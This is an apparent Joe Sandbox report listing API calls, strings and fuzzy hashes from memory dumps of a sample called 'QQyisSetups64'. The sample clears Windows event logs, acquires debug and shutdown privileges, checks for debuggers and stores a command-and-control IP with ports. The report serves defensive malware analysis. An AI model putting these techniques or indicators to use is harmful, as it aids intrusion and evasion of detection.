                                                                                                                                                                                                                      • Instruction ID: 63df16cf2dff0ac404127c696104869362978d5bdc7b53cf76e082ff2a69473d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55b25b724b6eacab5b0e250278fb66ed406bc927a1d4261f9142f53e5412aaf0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E216371A8070CAFD710FFE4DC0AFBE7778EB88710F108509FA05AA1C1DAB455448BA5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 03790576
                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 0379058E
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0379059E
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 037905AE
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004), ref: 03790600
                                                                                                                                                                                                                      • VirtualProtect.KERNEL32(?,-00000001,00000104,?), ref: 03790615
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Virtual$AddressAllocHandleInfoModuleProcProtectQuerySystem
                                                                                                                                                                                                                      • String ID: SetThreadStackGuarantee$kernel32.dll
                                                                                                                                                                                                                      • API String ID: 3290314748-423161677
                                                                                                                                                                                                                      • Opcode ID: 2d1702591c00eaf8f390fa41cba4999acc9f27c6dc41608ec142811fee678a98
                                                                                                                                                                                                                      • Instruction ID: 20c6b853de3f282f4104a4b2ec93000f3a47c0b64f7099168db2d19ac8826dd1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d1702591c00eaf8f390fa41cba4999acc9f27c6dc41608ec142811fee678a98
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E531F572E40619EFEF10EBA4EC84AEEB7B8EF84744F144616F501E3044DB74AA00CB90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 03787B89
                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 03787B90
                                                                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03787BB6
                                                                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03787BCC
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 03787BD2
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 03787BE0
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 03787BFB
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseHandleProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                      • API String ID: 3435690185-3733053543
                                                                                                                                                                                                                      • Opcode ID: 41d6b4edd8cadb51a5b8aa9149b929f8026cd514c9913faad920c880c367af02
                                                                                                                                                                                                                      • Instruction ID: 32b17cbe2578eb325c86b23cc08eb9a2083ce8f70f5faade43928a85eef63a75
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41d6b4edd8cadb51a5b8aa9149b929f8026cd514c9913faad920c880c367af02
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09119871A4060CABD714EFA4DC09FAF7B78EB84700F518559F90597180CA759900CBA0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • OpenEventLogW.ADVAPI32(00000000,037A58BC), ref: 0378B3E7
                                                                                                                                                                                                                      • ClearEventLogW.ADVAPI32(00000000,00000000), ref: 0378B3F2
                                                                                                                                                                                                                      • CloseEventLog.ADVAPI32(00000000), ref: 0378B3F9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Event$ClearCloseOpen
                                                                                                                                                                                                                      • String ID: Application$Security$System
                                                                                                                                                                                                                      • API String ID: 1391105993-2169399579
                                                                                                                                                                                                                      • Opcode ID: 5543741d8ad8441a4054c4d84028f3cf4647bc9f8444b893a485d40110b8fcf0
                                                                                                                                                                                                                      • Instruction ID: 527788397ce04bdf477112ca7c1942853369ca983d7265c1ff18150b692492a5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5543741d8ad8441a4054c4d84028f3cf4647bc9f8444b893a485d40110b8fcf0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82E02B32605B1857D211EF09E84871FF3D0FBCD715F04461DE98856604C6348401AB95
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: swprintf$_memset
                                                                                                                                                                                                                      • String ID: :$@
                                                                                                                                                                                                                      • API String ID: 1292703666-1367939426
                                                                                                                                                                                                                      • Opcode ID: 3d5004218d91dc4100e046b41ba34f0424eaff1e0d9aac26d7e5b183c8120afd
                                                                                                                                                                                                                      • Instruction ID: 51ff1bffd9c9526fd1153b6e28f6e3cecf10621530f37ce6c56abf64dfb4c297
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d5004218d91dc4100e046b41ba34f0424eaff1e0d9aac26d7e5b183c8120afd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 173161B6D0021CABDB14CFE5CC85FEEB7B9FB88300F50421DE90AAB281E6746905CB54
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,037878FC), ref: 03787756
                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,037878FC,?,?,?,?,?,?,771B0630), ref: 0378775D
                                                                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 03787785
                                                                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 037877B9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                                                                                                                      • API String ID: 2349140579-2896544425
                                                                                                                                                                                                                      • Opcode ID: 6ae2a15b91c3f51b2c99b7d63027ab45bbafafb50cbfc4d6d574661e37f1a352
                                                                                                                                                                                                                      • Instruction ID: 66141bd9c1461a1ca5024e32575db76f99d08ad9b70fc1f609c026bc6ae93b69
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ae2a15b91c3f51b2c99b7d63027ab45bbafafb50cbfc4d6d574661e37f1a352
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90116571A4020CABDB04EFE4DC49BEEB7B4EB48700F108558E505AB280DA759505CB60
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 0379131C
                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03791331
                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(037A25B8), ref: 0379133C
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 03791358
                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 0379135F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2579439406-0
                                                                                                                                                                                                                      • Opcode ID: e9fb8f597072b071108a7ee1727718a67809dc8f8e73f08a91078fd6668a9509
                                                                                                                                                                                                                      • Instruction ID: 4c3566ed50e05dec6c3bdf0dd98c827a73093bcec5e9070b1d96a2858efe1d82
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e9fb8f597072b071108a7ee1727718a67809dc8f8e73f08a91078fd6668a9509
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A21E0B9541B08EFD740FF2AF9486483BF4BB88301F50D45AE90887389EB789691CF55
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 02C8793D
                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02C87952
                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(02C95350), ref: 02C8795D
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 02C87979
                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 02C87980
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2579439406-0
                                                                                                                                                                                                                      • Opcode ID: 63248877459cebc8ff81fa9d1c84fab741d754062998c65b80264bb73cf6303e
                                                                                                                                                                                                                      • Instruction ID: 5a94c3f1b79fba3b490803ccc61687bdc02cc8887023ce0b76acd7318d32ed9d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 63248877459cebc8ff81fa9d1c84fab741d754062998c65b80264bb73cf6303e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF21EFB8C84600EFD702DF69F54D7183BA5BB48389F905A5AE4099B350EBB659A0CF48
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 03787B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 03787B89
                                                                                                                                                                                                                        • Part of subcall function 03787B70: OpenProcessToken.ADVAPI32(00000000), ref: 03787B90
                                                                                                                                                                                                                        • Part of subcall function 03787B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03787BB6
                                                                                                                                                                                                                        • Part of subcall function 03787B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03787BCC
                                                                                                                                                                                                                        • Part of subcall function 03787B70: GetLastError.KERNEL32 ref: 03787BD2
                                                                                                                                                                                                                        • Part of subcall function 03787B70: CloseHandle.KERNEL32(?), ref: 03787BE0
                                                                                                                                                                                                                      • ExitWindowsEx.USER32(00000005,00000000), ref: 0378B471
                                                                                                                                                                                                                        • Part of subcall function 03787B70: CloseHandle.KERNEL32(?), ref: 03787BFB
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 681424410-0
                                                                                                                                                                                                                      • Opcode ID: 72c80c8f8a63fc164683fc934af4520ed2047ad55319fe4fb84e2cb5275a8b35
                                                                                                                                                                                                                      • Instruction ID: 3b64ef46f6172ac85f4a4edbc60bf99ff687c4a3d0805eb0354cda4de5dc0b76
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 72c80c8f8a63fc164683fc934af4520ed2047ad55319fe4fb84e2cb5275a8b35
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41C08C3638024003D218B3BC782AB6AB741DB88362F20442BE71B8C0C00C56849009A6
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 03787B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 03787B89
                                                                                                                                                                                                                        • Part of subcall function 03787B70: OpenProcessToken.ADVAPI32(00000000), ref: 03787B90
                                                                                                                                                                                                                        • Part of subcall function 03787B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03787BB6
                                                                                                                                                                                                                        • Part of subcall function 03787B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03787BCC
                                                                                                                                                                                                                        • Part of subcall function 03787B70: GetLastError.KERNEL32 ref: 03787BD2
                                                                                                                                                                                                                        • Part of subcall function 03787B70: CloseHandle.KERNEL32(?), ref: 03787BE0
                                                                                                                                                                                                                      • ExitWindowsEx.USER32(00000006,00000000), ref: 0378B44D
                                                                                                                                                                                                                        • Part of subcall function 03787B70: CloseHandle.KERNEL32(?), ref: 03787BFB
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 681424410-0
                                                                                                                                                                                                                      • Opcode ID: c97f6ffc466d7c6105d545f12f5bbf2ebce5d08355ab99779c16590f89c3404e
                                                                                                                                                                                                                      • Instruction ID: a4ccb4ca15f9c9d3d2895ba5149b8168d8c1249fffb334d3d958461b56cb7a49
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c97f6ffc466d7c6105d545f12f5bbf2ebce5d08355ab99779c16590f89c3404e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7C08C3638020003D218B3BC782AB6AB742DB88362F20442BE60B8C0C00C5784A045A6
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 03787B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 03787B89
                                                                                                                                                                                                                        • Part of subcall function 03787B70: OpenProcessToken.ADVAPI32(00000000), ref: 03787B90
                                                                                                                                                                                                                        • Part of subcall function 03787B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03787BB6
                                                                                                                                                                                                                        • Part of subcall function 03787B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03787BCC
                                                                                                                                                                                                                        • Part of subcall function 03787B70: GetLastError.KERNEL32 ref: 03787BD2
                                                                                                                                                                                                                        • Part of subcall function 03787B70: CloseHandle.KERNEL32(?), ref: 03787BE0
                                                                                                                                                                                                                      • ExitWindowsEx.USER32(00000004,00000000), ref: 0378B429
                                                                                                                                                                                                                        • Part of subcall function 03787B70: CloseHandle.KERNEL32(?), ref: 03787BFB
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 681424410-0
                                                                                                                                                                                                                      • Opcode ID: b6a932964b7eb2326d9407302fc268143cb8d0e07ceaee746f4a8fca58e6ec68
                                                                                                                                                                                                                      • Instruction ID: 4f29acf1c5a06a970cdba1e3fa42ba358b9dbda7539374a7e89bb7d7a422329b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6a932964b7eb2326d9407302fc268143cb8d0e07ceaee746f4a8fca58e6ec68
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4FC08C3638020007D218B3BC782AB69B741DB88362F20442BE70B8C0C00C66849005AA
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0378F707: _malloc.LIBCMT ref: 0378F721
                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002,?), ref: 0378B586
                                                                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(?,IpDate), ref: 0378B596
                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,IpDate,00000000,00000003,00000002,?), ref: 0378B5B3
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0378B5D4
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0378B61B
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0378B63C
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0378B72C
                                                                                                                                                                                                                      • Sleep.KERNEL32(000007D0), ref: 0378B737
                                                                                                                                                                                                                        • Part of subcall function 0378F707: std::exception::exception.LIBCMT ref: 0378F756
                                                                                                                                                                                                                        • Part of subcall function 0378F707: std::exception::exception.LIBCMT ref: 0378F770
                                                                                                                                                                                                                        • Part of subcall function 0378F707: __CxxThrowException@8.LIBCMT ref: 0378F781
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseValue_memsetstd::exception::exception$DeleteException@8OpenSleepThrow_malloc
                                                                                                                                                                                                                      • String ID: 118.107.44.219$118.107.44.219$118.107.44.219$19091$19092$19093$Console$IpDate$o1:$o2:$o3:$p1:$p2:$p3:$t1:$t2:$t3:
                                                                                                                                                                                                                      • API String ID: 1186799303-3661167401
                                                                                                                                                                                                                      • Opcode ID: 9ed1716ac99e485894786c5cfd5ad17043e699fb5df36ea61aec837eabf48fbc
                                                                                                                                                                                                                      • Instruction ID: 497cac8cbb86d2554d42cc001241eca36f03bcee180b5f21066b8daef1cdc1e9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ed1716ac99e485894786c5cfd5ad17043e699fb5df36ea61aec837eabf48fbc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8941C5B57C4B047FE210FB18AC4AF5E73549FC5B20F148214FA157E283E7E4A51586AB
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,03790FC1,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 0379401C
                                                                                                                                                                                                                      • __mtterm.LIBCMT ref: 03794028
                                                                                                                                                                                                                        • Part of subcall function 03793CF1: DecodePointer.KERNEL32(00000009,03791084,0379106A,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 03793D02
                                                                                                                                                                                                                        • Part of subcall function 03793CF1: TlsFree.KERNEL32(00000027,03791084,0379106A,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 03793D1C
                                                                                                                                                                                                                        • Part of subcall function 03793CF1: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,03791084,0379106A,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 03798D48
                                                                                                                                                                                                                        • Part of subcall function 03793CF1: _free.LIBCMT ref: 03798D4B
                                                                                                                                                                                                                        • Part of subcall function 03793CF1: DeleteCriticalSection.KERNEL32(00000027,?,?,03791084,0379106A,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 03798D72
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0379403E
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0379404B
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 03794058
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 03794065
                                                                                                                                                                                                                      • TlsAlloc.KERNEL32(?,?,03790FC1,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 037940B5
                                                                                                                                                                                                                      • TlsSetValue.KERNEL32(00000000,?,?,03790FC1,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 037940D0
                                                                                                                                                                                                                      • __init_pointers.LIBCMT ref: 037940DA
                                                                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,03790FC1,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 037940EB
                                                                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,03790FC1,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 037940F8
                                                                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,03790FC1,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 03794105
                                                                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,03790FC1,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 03794112
                                                                                                                                                                                                                      • DecodePointer.KERNEL32(Function_00013E75,?,?,03790FC1,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 03794133
                                                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 03794148
                                                                                                                                                                                                                      • DecodePointer.KERNEL32(00000000,?,?,03790FC1,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 03794162
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 03794174
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                                                                      • API String ID: 3698121176-3819984048
                                                                                                                                                                                                                      • Opcode ID: 1c3fbab96d99c3c6055c6fa7f896e31ae3e30ad47a23acf4ba69f9c03ec13e28
                                                                                                                                                                                                                      • Instruction ID: 67b9ae7f1e1f354d20890acdc0dd23d4ab83d0bd18dcb8effcff67135d334763
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c3fbab96d99c3c6055c6fa7f896e31ae3e30ad47a23acf4ba69f9c03ec13e28
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B3152B59407049EFB51FF7AB80CF5A7EB4EF852A0B158717E81086698F7388441DF51
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,02C875E2,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C89ACE
                                                                                                                                                                                                                      • __mtterm.LIBCMT ref: 02C89ADA
                                                                                                                                                                                                                        • Part of subcall function 02C897A5: DecodePointer.KERNEL32(00000008,02C876A5,02C8768B,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C897B6
                                                                                                                                                                                                                        • Part of subcall function 02C897A5: TlsFree.KERNEL32(00000025,02C876A5,02C8768B,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C897D0
                                                                                                                                                                                                                        • Part of subcall function 02C897A5: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,02C876A5,02C8768B,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C8C031
                                                                                                                                                                                                                        • Part of subcall function 02C897A5: _free.LIBCMT ref: 02C8C034
                                                                                                                                                                                                                        • Part of subcall function 02C897A5: DeleteCriticalSection.KERNEL32(00000025,?,?,02C876A5,02C8768B,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C8C05B
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02C89AF0
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02C89AFD
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02C89B0A
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02C89B17
                                                                                                                                                                                                                      • TlsAlloc.KERNEL32(?,?,02C875E2,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C89B67
                                                                                                                                                                                                                      • TlsSetValue.KERNEL32(00000000,?,?,02C875E2,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C89B82
